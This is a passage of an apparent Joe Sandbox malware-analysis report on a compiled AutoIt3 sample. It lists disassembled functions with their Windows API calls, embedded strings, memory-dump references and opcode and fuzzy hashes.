                            • Opcode Fuzzy Hash: 31055361bb23fb69776b437317d2b9f56b450a4755efb764b7e77d70b224212f
                            • Instruction Fuzzy Hash: F121073170120CBBDB119B658C99EEE7BA8EB4D720F44402AFD04DB2C0D6B48D858B95
                            Function 00435A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                            Download Yara Rule
                            APIs
                            • IsWindow.USER32(00000000), ref: 00435A6E
                            • GetForegroundWindow.USER32 ref: 00435A85
                            • GetDC.USER32(00000000), ref: 00435AC1
                            • GetPixel.GDI32(00000000,?,00000003), ref: 00435ACD
                            • ReleaseDC.USER32(00000000,00000003), ref: 00435B08
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$ForegroundPixelRelease
                            • String ID:
                            • API String ID: 4156661090-0
                            • Opcode ID: b3f2f8084eb84bbbb77d9d7a850d26e8df9bfdf9730a8673b956906f1cba3a78
                            • Instruction ID: 039f6854145a2cf6affa6225623ccd0f32c2ef49bff73d4185cd712b0571047f
                            • Opcode Fuzzy Hash: b3f2f8084eb84bbbb77d9d7a850d26e8df9bfdf9730a8673b956906f1cba3a78
                            • Instruction Fuzzy Hash: 65219F35A00204AFD700EFA5DC88A9ABBE5EF49310F15807EF809D7362CA74AC05CB94
                            Function 003C12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                            Download Yara Rule
                            APIs
                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 003C134D
                            • SelectObject.GDI32(?,00000000), ref: 003C135C
                            • BeginPath.GDI32(?), ref: 003C1373
                            • SelectObject.GDI32(?,00000000), ref: 003C139C
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ObjectSelect$BeginCreatePath
                            • String ID:
                            • API String ID: 3225163088-0
                            • Opcode ID: cd40c943b9d3a7cebfc3f2efff27f3a4606ba0596b56887bdc32a7b58d2cd998
                            • Instruction ID: 1b58d45d71a7eb5f3e0e34a2873c7d004eca72f31903069e04d87f85595ba8c7
                            • Opcode Fuzzy Hash: cd40c943b9d3a7cebfc3f2efff27f3a4606ba0596b56887bdc32a7b58d2cd998
                            • Instruction Fuzzy Hash: 59215E35800648EBDB12AF65DC08B6D7BE8EB02325F144A3FE810D65B1D7719CA5EF98
                            Function 00424A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00424ABA
                            • __beginthreadex.LIBCMT ref: 00424AD8
                            • MessageBoxW.USER32 ref: 00424AED
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00424B03
                            • CloseHandle.KERNEL32(00000000), ref: 00424B0A
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                            • String ID:
                            • API String ID: 3824534824-0
                            • Opcode ID: 3e402cafa17a6fd75ffc00f2451b9b010fdeacfc16d91215cb38dd04053215b9
                            • Instruction ID: 146c76699ed1b9b220670d7226288582fc3aba91aefb995c600f69185d0df059
                            • Opcode Fuzzy Hash: 3e402cafa17a6fd75ffc00f2451b9b010fdeacfc16d91215cb38dd04053215b9
                            • Instruction Fuzzy Hash: AF110876A04664BBC7018FA8AC08A9F7FACEB85320F1442BAF814D3350DA75DD048BA5
                            Function 00418202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0041821E
                            • GetLastError.KERNEL32(?,00417CE2,?,?,?), ref: 00418228
                            • GetProcessHeap.KERNEL32(00000008,?,?,00417CE2,?,?,?), ref: 00418237
                            • HeapAlloc.KERNEL32(00000000,?,00417CE2,?,?,?), ref: 0041823E
                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00418255
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                            • String ID:
                            • API String ID: 842720411-0
                            • Opcode ID: c08f54d20f9278584e0c81f8637786b132fb90be4b380b1a7847667a25af8352
                            • Instruction ID: 4dfb2fd963fa47ac34de6f03f277732643d42b2686be4ccd1398a2db3c6bc835
                            • Opcode Fuzzy Hash: c08f54d20f9278584e0c81f8637786b132fb90be4b380b1a7847667a25af8352
                            • Instruction Fuzzy Hash: 2F016975200604BFDB214FA6DC48DAB7BACEF8B754B60047AFD09C2220DA318C44CA64
                            Function 0041710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                            Download Yara Rule
                            APIs
                            • CLSIDFromProgID.OLE32 ref: 00417127
                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 00417142
                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00417044,80070057,?,?), ref: 00417150
                            • CoTaskMemFree.OLE32(00000000), ref: 00417160
                            • CLSIDFromString.OLE32(?,?), ref: 0041716C
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: From$Prog$FreeStringTasklstrcmpi
                            • String ID:
                            • API String ID: 3897988419-0
                            • Opcode ID: cb91c7b00c26c5e10636ede166580efb3f5f319f405f6ecfbef587e70e4d15c6
                            • Instruction ID: 5eb331f7d3b53411696faca72adc74b760c8b38987ff9759bdd2fecb8c638465
                            • Opcode Fuzzy Hash: cb91c7b00c26c5e10636ede166580efb3f5f319f405f6ecfbef587e70e4d15c6
                            • Instruction Fuzzy Hash: 7801DFBA600208BBCB105F64DC44BAABBBCEF45791F100075FD04D6320DB36DD818BA4
                            Function 00425244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                            Download Yara Rule
                            APIs
                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00425260
                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0042526E
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00425276
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00425280
                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004252BC
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: PerformanceQuery$CounterSleep$Frequency
                            • String ID:
                            • API String ID: 2833360925-0
                            • Opcode ID: 138dc0c63edb8f7385c2d0b5146884b1e89d544f30cf8a2981db9004cfc99f2e
                            • Instruction ID: d258f19f819e86861d1d93c4797836a78502ebc45fd832c9ad356daad64eeb0a
                            • Opcode Fuzzy Hash: 138dc0c63edb8f7385c2d0b5146884b1e89d544f30cf8a2981db9004cfc99f2e
                            • Instruction Fuzzy Hash: DA012135E01A2DDBCF00DFE4ED496EDBB78FF0A711F8101A6D541B2280CB7459548BA9
                            Function 0041810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00418121
                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0041812B
                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0041813A
                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00418141
                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00418157
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: HeapInformationToken$AllocErrorLastProcess
                            • String ID:
                            • API String ID: 44706859-0
                            • Opcode ID: aef73fbac0bfff11a1b1576570bc963bb5a023924518a0e10ac38801231d79f5
                            • Instruction ID: 17d0f9705bff3a2c671f0b70dac8350dafbb7c3480b479545d6ffe4e36dc83d7
                            • Opcode Fuzzy Hash: aef73fbac0bfff11a1b1576570bc963bb5a023924518a0e10ac38801231d79f5
                            • Instruction Fuzzy Hash: 45F06275240304BFEB210FA5ECC8EA73BADFF8A754B10003AF945D6250CBA59D45DA64
                            Function 0041C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetDlgItem.USER32(?,000003E9), ref: 0041C1F7
                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041C20E
                            • MessageBeep.USER32(00000000), ref: 0041C226
                            • KillTimer.USER32 ref: 0041C242
                            • EndDialog.USER32 ref: 0041C25C
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                            • String ID:
                            • API String ID: 3741023627-0
                            • Opcode ID: cf637620ff695445ffc68bc20458ac23fd8054a4c7dd54cffe2a37aa23dc12ea
                            • Instruction ID: 098b2a1e705143d12f280c90b4053b9b8f6e1078a3117ce504adb6e6092dc07e
                            • Opcode Fuzzy Hash: cf637620ff695445ffc68bc20458ac23fd8054a4c7dd54cffe2a37aa23dc12ea
                            • Instruction Fuzzy Hash: 1701DB348443049BEB205B54DD8EFD67778FF01706F0006BAF942914E0D7F46989CB54
                            Function 003C13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Path$ObjectStroke$DeleteFillSelect
                            • String ID:
                            • API String ID: 2625713937-0
                            • Opcode ID: e8c09d81d8934c37269751090568ddaae023a1b3542c1d967aaaf13aa935fa0a
                            • Instruction ID: dc18df35b83f5ccd9290cecf5b4c90bc275d05c6fb2f8cedcee4a4c013a23826
                            • Opcode Fuzzy Hash: e8c09d81d8934c37269751090568ddaae023a1b3542c1d967aaaf13aa935fa0a
                            • Instruction Fuzzy Hash: 58F0CD34004648DBDB266F56EC4CB5C3FE4AB42326F188A39E429894F2D73149A5DF58
                            Function 003D2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003E0DB6: std::exception::exception.LIBCMT ref: 003E0DEC
                              • Part of subcall function 003E0DB6: __CxxThrowException@8.LIBCMT ref: 003E0E01
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 003C7A51: _memmove.LIBCMT ref: 003C7AAB
                            • __swprintf.LIBCMT ref: 003D2ECD
                            Strings
                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 003D2D66
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                            • API String ID: 1943609520-557222456
                            • Opcode ID: a0df1cf4f53ab7036144547efbd8f34c31c6aa95dfa6ddc26d0d74716e31e169
                            • Instruction ID: 22285c84bc302e55c8f9b89d35564f7551df378a969352b73779df05d03792f3
                            • Opcode Fuzzy Hash: a0df1cf4f53ab7036144547efbd8f34c31c6aa95dfa6ddc26d0d74716e31e169
                            • Instruction Fuzzy Hash: 979169721082119BC716EF24D885D6FB7B8AF95710F01492EF846DB2A1EB70EE44CB52
                            Function 0042B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C4743,?,?,003C37AE,?), ref: 003C4770
                            • CoInitialize.OLE32(00000000), ref: 0042B9BB
                            • CoCreateInstance.OLE32(00452D6C,00000000,00000001,00452BDC,?), ref: 0042B9D4
                            • CoUninitialize.OLE32 ref: 0042B9F1
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                            • String ID: .lnk
                            • API String ID: 2126378814-24824748
                            • Opcode ID: ef5a72826720befaa34066df7ce9cc8cb2373a76aeab4b3422594906f52a1df8
                            • Instruction ID: 10ad3e4c13c9de0018e2ef560c85e58edc8f20c6f4d8716c25c830b850df4188
                            • Opcode Fuzzy Hash: ef5a72826720befaa34066df7ce9cc8cb2373a76aeab4b3422594906f52a1df8
                            • Instruction Fuzzy Hash: C5A143756043119FCB00DF14C884E6ABBE5FF89314F15899AF8999B3A2CB35EC45CB91
                            Function 0041B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                            Download Yara Rule
                            APIs
                            • OleSetContainedObject.OLE32(?,00000001), ref: 0041B4BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ContainedObject
                            • String ID: AutoIt3GUI$Container$%E
                            • API String ID: 3565006973-4107763017
                            • Opcode ID: 5798df0d7105f339a0d8cbebe1039b33c36bc7b072d24465c3ef747b14a9b6b8
                            • Instruction ID: 0036108641c0c713f9538960118c60be45f99714e70c9c9064f70d3c8bde3377
                            • Opcode Fuzzy Hash: 5798df0d7105f339a0d8cbebe1039b33c36bc7b072d24465c3ef747b14a9b6b8
                            • Instruction Fuzzy Hash: B3913970600601AFDB14DF65C884BAAB7F5FF49714F20856EE94ACB391DBB4E881CB94
                            Function 003E501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                            Download Yara Rule
                            APIs
                            • __startOneArgErrorHandling.LIBCMT ref: 003E50AD
                              • Part of subcall function 003F00F0: __87except.LIBCMT ref: 003F012B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ErrorHandling__87except__start
                            • String ID: pow
                            • API String ID: 2905807303-2276729525
                            • Opcode ID: f1476d1feea51e52c6eb9346c4b48afd7e3b5a2270f0c906e0ba8da4249da900
                            • Instruction ID: 9a00c71107e0aae3a531d2f2172421c1e57f1637b9114b4b9cf20d10b7f22618
                            • Opcode Fuzzy Hash: f1476d1feea51e52c6eb9346c4b48afd7e3b5a2270f0c906e0ba8da4249da900
                            • Instruction Fuzzy Hash: 3F519C7090864A96DF1B7B2DCD0137E2BD49B40704F208E69F5D58A2EBDF348DC49A86
                            Function 00408584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: 3c=$_=
                            • API String ID: 4104443479-3170935384
                            • Opcode ID: c26e2f17a631ef79644a5adcc4b4f887ff58be72088bef4730a5a251d12917e7
                            • Instruction ID: 3f78befc65fd3365e465319a539acf0a895e213d79f7551bf8ec5c9eaf3e7ea1
                            • Opcode Fuzzy Hash: c26e2f17a631ef79644a5adcc4b4f887ff58be72088bef4730a5a251d12917e7
                            • Instruction Fuzzy Hash: E6519E70E00619DFCB25CF68C980AAEB7B1FF44304F14852EE89AE7390EB35A955CB55
                            Function 004197F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004214BC: WriteProcessMemory.KERNEL32 ref: 004214E6
                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0041983F
                              • Part of subcall function 00421487: ReadProcessMemory.KERNEL32 ref: 004214B1
                              • Part of subcall function 004213DE: GetWindowThreadProcessId.USER32(?,?), ref: 00421409
                              • Part of subcall function 004213DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0041925A,00000034,?,?,00001004,00000000,00000000), ref: 00421419
                              • Part of subcall function 004213DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0041925A,00000034,?,?,00001004,00000000,00000000), ref: 0042142F
                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004198AC
                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004198F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                            • String ID: @
                            • API String ID: 4150878124-2766056989
                            • Opcode ID: b51d5e50077a7291fb43bba9b5fe2227cdee5d40e3d1538fad85da5efa3b131c
                            • Instruction ID: 14811f6d2a06fdf75dec2d69f3285c4e8f738e91bf8f03d9c4a0bd080fb92fa3
                            • Opcode Fuzzy Hash: b51d5e50077a7291fb43bba9b5fe2227cdee5d40e3d1538fad85da5efa3b131c
                            • Instruction Fuzzy Hash: 96414F76A0111CAEDB10EFA4CD51EDEBBB8EB05300F00409AF959B7251DA746E85CBA4
                            Function 00447946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                            Download Yara Rule
                            APIs
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004479DF
                            • GetWindowLongW.USER32 ref: 004479FC
                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00447A0C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$Long
                            • String ID: SysTreeView32
                            • API String ID: 847901565-1698111956
                            • Opcode ID: 9cd004971301ca97330ca988436f696a80a0fae1c51344c35070f3b5987455a5
                            • Instruction ID: ac196c84d87635ea1d00f234a88a39c0c46d0ded15a6943a3543cb852b43db5f
                            • Opcode Fuzzy Hash: 9cd004971301ca97330ca988436f696a80a0fae1c51344c35070f3b5987455a5
                            • Instruction Fuzzy Hash: 1031DE71204206ABEB118F38DC45BEB77A9EB05324F20872AF875E22E1D734ED528B54
                            Function 00447A71 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97windowCOMMON
                            Download Yara Rule
                            APIs
